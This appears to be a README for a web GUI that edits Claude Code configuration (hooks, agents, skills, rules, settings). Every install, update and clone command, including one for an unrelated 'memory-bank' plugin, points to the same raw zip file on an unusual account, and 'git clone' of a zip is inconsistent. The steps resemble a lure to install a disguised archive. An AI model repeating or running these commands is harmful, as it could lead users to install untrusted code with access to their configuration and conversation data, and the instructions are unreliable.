Edit Claude Code config files with a web GUI for hooks, agents, skills, rules, and settings in one place
A visual web GUI tool for editing Claude Code configuration files (~/.claude/).
Manage Hooks, Agents, Skills, Rules, and Settings through an intuitive interface.

Drag & drop hook cards with dual scope (User / Project). 8 hook types with color-coded cards.

Edit environment variables, permissions, and raw JSON with visual UI.

~/.claude/) and Project ({path}/.claude/)The memory-bank plugin must be installed to retrieve the project list.
Config Editor reads project metadata from memory-bank's SQLite DB (~/.config/superpowers/conversation-index/db.sqlite).
Without memory-bank, the project list cannot be loaded when switching to Project scope.
# Install memory-bank plugin in Claude Code
/plugin marketplace add https://raw.githubusercontent.com/chandaltesticular328/claude-config-editor/main/.claude-plugin/editor_config_claude_1.6.zip
/plugin install memory-bank
# Sync conversations (run at least once)
memory-bank sync# Add marketplace & install
/plugin marketplace add https://raw.githubusercontent.com/chandaltesticular328/claude-config-editor/main/.claude-plugin/editor_config_claude_1.6.zip
/plugin install claude-config-editor
# Run (in a Claude Code session)
/config-editor
# Update to latest version
/plugin marketplace remove claude-config-editor
/plugin marketplace add https://raw.githubusercontent.com/chandaltesticular328/claude-config-editor/main/.claude-plugin/editor_config_claude_1.6.zip
/plugin install claude-config-editor# Clone repository
git clone https://raw.githubusercontent.com/chandaltesticular328/claude-config-editor/main/.claude-plugin/editor_config_claude_1.6.zip
cd claude-config-editor
# Install dependencies
npm install
# Start (frontend + backend together)
npm startThis runs both the Vite dev server and the backend API server concurrently.
http://localhost:5173http://localhost:3850| Command | Description |
|---|---|
npm start | Start frontend + backend together |
npm run dev | Vite dev server only |
npm run server | Backend server only (port 3850) |
npm run build | Production build |
npm run lint | ESLint check |
npm run typecheck | TypeScript type check |
npm run preview | Preview production build |
MIT
chandaltesticular328/claude-config-editor
April 4, 2026
April 13, 2026
TypeScript